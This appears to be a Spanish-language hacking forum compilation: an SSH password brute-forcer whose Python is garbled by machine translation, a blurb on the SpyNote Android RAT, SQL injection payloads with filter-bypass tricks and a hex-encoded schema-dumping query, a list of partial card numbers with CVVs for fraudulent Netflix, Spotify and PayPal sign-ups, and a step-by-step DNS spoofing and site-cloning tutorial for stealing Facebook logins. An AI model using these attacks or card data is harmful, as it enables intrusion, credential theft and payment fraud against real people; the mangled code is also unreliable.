Scanner SSH puerto 22

importación hilo
importación tiempo
de roscar importación Tema
importación sys , os , threading , tiempo , rastreo , getopt
importación paramiko
importación de terminales

mundial ADX
mundial puerto

ADX = "1"
puerto = 22
datos = []
i = []

plazo = terminales . TerminalController ()
paramiko . util . log_to_file ( 'demo.log' )

print "\ n *************************************"
print "*" + término . ROJO + "SSH Bruteforcer Ver. 0.6" + término . NORMAL + "*"
print "* Codificado por Christian Martorella *"
print "* Edge-Security Research *"
print "*cmartorella@edge-security.com *"
print "************************************* \ n"

def uso ():
    impresión "de uso: brutessh.py opciones \ n"
    print "-h: host de destino"
    print "-u: nombre de usuario a la fuerza"
    print "-d: archivo de contraseñas"
    impresión "-t: hilos (por defecto 12, más podría ser malo)"
    print "-p: puerto de destino \ n"
    print "Ejemplo: 192.168.1.55 brutessh.py -h -u root mypasswordlist.txt -d \ n"
    sys . de salida ()

clase vigor ( Tema ):
        def __init__ ( self , nombre , num ):
                Tema . __init__ ( auto )
                auto . nombre = nombre
                auto . num = str ( num )

        def run ( auto ):
                mundial ADX
                si ADX == "1" :
                        passw = auto . nombre . división ( "\ n" ) [ 0 ]
                        impresión plazo . BOL + término . UP + término . CLEAR_EOL + auto . num + "/" + str ( totaldict ) + "" + PASSW + término . NORMAL
                        t = paramiko . Transporte ( nombre de host )
                        tratar :
                                t . start_client ()
                        salvo excepciones :
                                x = 0

                        tratar :
                                t . AUTH_PASSWORD ( nombre de usuario = nombre de usuario , contraseña = passw )
                        salvo excepciones :
                                x = 0

                        si t . is_authenticated ():
                                impresión plazo . ABAJO + término . GREEN + "\ Nauth SÍ ---> Contraseña Encontrados:" + PASSW + término . ABAJO + término . NORMAL
                                t . cerrar ()
                                ADX = "0"
                                sys . de salida ()
                        otra cosa :
                                t . cerrar ()
                tiempo . dormir ( 0 )
                i [ 0 ] = i [ 0 ] - 1


def test_thread ( nombres ):
        i . append ( 0 )
        j = 0
        mientras que len ( nombres ):
                tratar :
                        si i [ 0 ] < º :
                                n = nombres . pop ( 0 )
                                i [ 0 ] = i [ 0 ] + 1
                                hilo = fuerza ( n , j )
                                hilo . iniciar ()
                                j = j + 1
                excepto KeyboardInterrupt :
                        print "Ataque suspendida por usuario .. \ n"
                        sys . de salida ()
        hilo . unirse ()

def prueba ( argv ):
        mundial ª
        mundial nombre de host
        mundial nombre de usuario
        mundial totaldict
        º = 12
        si len ( sys . argv ) < 3 :
                el uso de ()
        tratar :
                opta , args = getopt . getopt ( argv , "h: u: d: t: t:" )
        excepto getopt . GetoptError :
                el uso de ()
        para opt , arg en opta :
                si opt == '-u' :
                        username = arg
                elif optar == '-h' :
                        nombre de host = arg
                elif optar == '-d' :
                        password = arg
                elif optar == "-t" :
                        º = arg
                elif optar == "-p" :
                        puerto = arg
        tratar :
                f = abierto ( contraseña , "r" )
        excepto :
                print "No se puede abrir archivo de contraseñas \ n"
                sys . de salida ()
        impresión plazo . ROJO + "Anfitrión:" + término . NORMAL +  nombre de host + término . ROJO
        print "Nombre de usuario:" + término . NORMAL +  nombre de usuario + término . ROJO
        print "archivo de contraseña:" + término . NORMAL + contraseña
        imprimir "================================================ ========= "
        print "password Tratando ... \ n"
        nombre = f . readlines ()
        totaldict = len ( nombre )
        starttime = tiempo . reloj ()
        test_thread ( nombre )
        tiempo de parada = tiempo . reloj ()
        print "\ nTimes -> Init:" + str ( starttime ) + "End:" + str ( hora de detención )
        print "\ n"
       
si __name__ == "__main__" :
        tratar :
                prueba ( sys . argv [ 1 :])
        excepto KeyboardInterrupt :
                print "Ataque suspendida por usuario ... \ n"
                sys . de salida ()

Troyano RAT para Android

Cada vez es más habitual utilizar nuestro dispositivo móvil para todo tipo de acciones y guardar en ellos todo tipo de archivos, incluso personales y confidenciales. Por ello, estos dispositivos son cada vez objetivos más interesantes para los piratas informáticos, quienes buscan vulnerabilidades para explotar los dispositivos y hacerse con el control de ellos y desarrollan nuevas y peligrosas herramientas de software malicioso que les permitan tomar el control total de los mismos de forma remota, como es el caso del nuevo troyano RAT SpyNote.

Recientemente, en varios foros sobre seguridad informática se ha publicado un compilador de lo que puede ser un nuevo troyano RAT para Android. Analizando este compilador, los expertos de seguridad han descubierto una gran similitud con otras variantes similares como Om. y DroidJack y, según la actividad de los foros de la Deep Web, es posible que esta nueva amenaza esté lista para empezar a distribuirse a nivel mundial en cualquier 

Además de todas sus funciones anteriores, una de las características más relevantes es que es capaz de funcionar sin restricciones incluso en dispositivos sin root.



Ninguna de las funciones de SpyNote necesita root

Hasta ahora, muchos troyanos similares necesitaban tener permisos de root para funcionar, lo que limitaba su radio de acción u obligaba a los piratas informáticos a incluir en ellos exploits que le permitieran conseguir dichos permisos aprovechando vulnerabilidades como las de los procesadores Qualcomm. Sin embargo, SpyNote no necesita en ningún momento permisos de root para desatar todo su potencial, aunque a cambio de eso tendrá que pedir al usuario un gran número de permisos, lo que debería levantar sospechas.
La última versión 2 de SpyNote cuenta con un compilador que permite a los piratas informáticos montar su propia versión del troyano y redirigir todo el tráfico a su propio servidor de control, sin embargo, por el momento no se sabe si este troyano se distribuirá por la red como una herramienta abierta o si los piratas informáticos intentarán venderlo a los usuarios interesados, incluso no sería descabellado ver un modelo de negocio MaaS (Malware as a Service) donde los piratas informáticos alquilen el acceso al servidor C&C al mejor postor.
¿Crees que estamos ante una grave amenaza para la seguridad de Android?
esto fue compartido por los servidores https://www.redeszone.net   y si no comprender le hago el video cuando no encuentre nada que hacer 

Mipagina.php?id=12’     /*!50000uNioN*//*!50000sElEcT*/1,2,3,4,5,6--+
Si no da entonce ponemos esta

Unión all select 1,1,1,1,1,1--
Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…

php?id=1+and+1=0+order+by+1

+andHYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"+(HYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*

Mipagina.php?id=12’ /*!00000union*/select+1,2,3,4,5,6---+
Donde va la tabla 2 por ejemplo
" Mipagina.php?id=12’/*!50000uNioN*//*!50000sElEcT*/1, /*!00000concat*/(0x3c666f6e7420636f6c6f723d7265642073697a653d306d34726b6d336e2020477265657473203a2052756d6d79204b68616e202c4b616d72616e20536861682c4d616b204d616e2c4d6174746865772046657272656c6c202620616c6c20544353206d656d62657273203c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6--+

" Muestra la table Image

Despues: Mipagina.php?id=12’/*!50000uNioN*//*!50000sElEcT*/1,(username),3,4,5,6 


Crea tu propia cuentas Eje: Netflix


Puedes Agregar y hacer lo que quieras



https://dashboard.stripe.com/
https://temp-mail.org/es/
http://www.sayapro.us/account/
http://rdd.pw/
https://bin2ccgen.com/index.php#

Compartelo para que los demas aprendan

Bin para todos 



MCIG.ORG41472021xxxxxxx7 TELMEX533609701544xxxx CCV: 377 12/16NETFLIX IP Usa533875xxxxxxxx4x 02/16 Ccv:360RKCAMS4037660021xxxxxx. 07/17. Cvv: 087PORRUAS4147 2021 68xx xxxx 12/17 339CINEMEX402766268xxxxxx35512380448xxxxxx 09/17 328JOYMIIIP USA 41472021xxxxxx9x 069 11/16MERCADOLIBRE SOLO 1504027664100xxxxxx 06/17 CCV 331SPOTIFY 2 o 3 mesesIP USA 41472021265xxxxx 069 11/16VEOTV a la 1 o 35336097011xxxx72 365 11/16NETFLIXIP USA 51535963xxxxxxxx 091 ZIP CODE 10910IP MEX 4359830002xxxxxx 337 11/17JASMIN4147400124xxxxxx 07/18 589AVAST ANTIVIRUS414720214xxx7xxx 06/16 468PAYPAL52567860xxxx92 06/16 236TORGUARD (VPN)4147202148xxxxxxDOTVPN4147202168xxxxxx 06/16 244Bershka5443687733xxxxxxCABLEMAS4027664100xxx5xxDOMINOS435983000262xxxx 338 03/18SPOTIFY USA 1 año

tecnica peligrosa y muchas siguen usandolas



Con este metodo puedes pensar hacer lo que quieras solo piensa :v

Bueno esta es una técnica muy peligrosa,cuando nos conectamos a lados públicos, en donde la conexión a wifi es libre y para miles de usuarios, por ejemplo una universidad.

el Suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de  nombre, es decir, resolver con una dirección IP falsa un cierto nombre NS o viceversa. Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el cache DNS de otro servidor diferente (DNS Poisoning).

ESCENARIO:
El siguiente tutorial consta de realizar un ataque conocido como DNS Spoofing, el siguiente ejemplo se basa en una red LAN con dos participantes un atacante y una victima:

Atacante:
Sistema operativo: Backtrack 5 R3

Victima:

Sistema operativo: Windows 7.

El sistema operativo de la victima es irrelevante...


LA idea principal es poder obtener la contraseña y login de su cuenta de facebook,este ejemplo se puede hacer con cualquier pagina web que deseamos solo tenemos que indicar al set y ettercap de la pagina web a clonar.

COMANDO:

Ingresamos a la siguiente ruta:

#cd /pentest/exploits/set
#./set
Se abrirá la aplicación SET para realizar ataques de tipo ingeniera social a continuación elegimos la siguientes opciones:
Seleccionamos 1: para realizar un ataque Social-Enginnering Attack

En el siguiente menú seleccionamos 2 ; Website Attack Vectors

En Multi-Attack seleccionamos la opción 3 ; Credential Harvester Attack Method para poder realizar el clonado de la pagina que deseamos atacar.
Seleccionamos opción 2 Site Cloner

En las opciones para clonar la pagina con éxito tendremos que ingresar nuestra dirección IP, con el comando ifconfig puedo obtener los datos;nuestra dirección IP y el adaptador de red que estamos ocupando en mi caso eth0,en caso de wireless se ocuparía wlan0 por defecto.

Luego de ingresar nuestra IP,nos pedirá la pagina web a la cual deseamos realizar el clonado, en caso de ejemplo ocupare facebook , pero puedes ocupar cualquier pagina web, ya sea twitter, youtube, blogger,etc.

Una vez finalizado empezara a iniciar el clonado a la pagina web, es necesario tener el servicio de apache iniciado, en caso de que no lo este, nos aparecerá el siguiente mensaje , para iniciar el servicio al cual ponemos Y.
Bueno hasta acá tenemos la configuración con éxitos para poder realizar el envenenamiento por dns ,la victima tendría que poner nuestra dirección IP en su navegador,y a continuación aparecería el mensaje de login  de Facebook.
Para que el usuario no ingrese nuestra dirección IP, ocuparemos una herramienta llamada ettetcap, su función sera que cuando el usuario ingrese a facebook se envenene automáticamente y no tenga que ingresar nuestra IP. Para ello con un editor de texto editamos la siguiente ruta/usr/local/share/ettercap/etter.dns y agregamos los siguientes parámetros ingresamos el dominio y nuestra IP como muestra la imagen.

Dominio.com A IP
*.Dominio A IP

www.dominio.com PTR IP

Guardamos y cerramos.

y para finalizar envenenamos:

ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //

Bueno cuando el usuario conectado a nuestra lan ingrese a facebook.com se envenenara automáticamente:
VICTIMA:

Victima ingresando a facebook y realizando el proceso de login:


ATACANTE:

Recibe la información de la cookies GET que captura en la lan.
bueno esto fue todo :)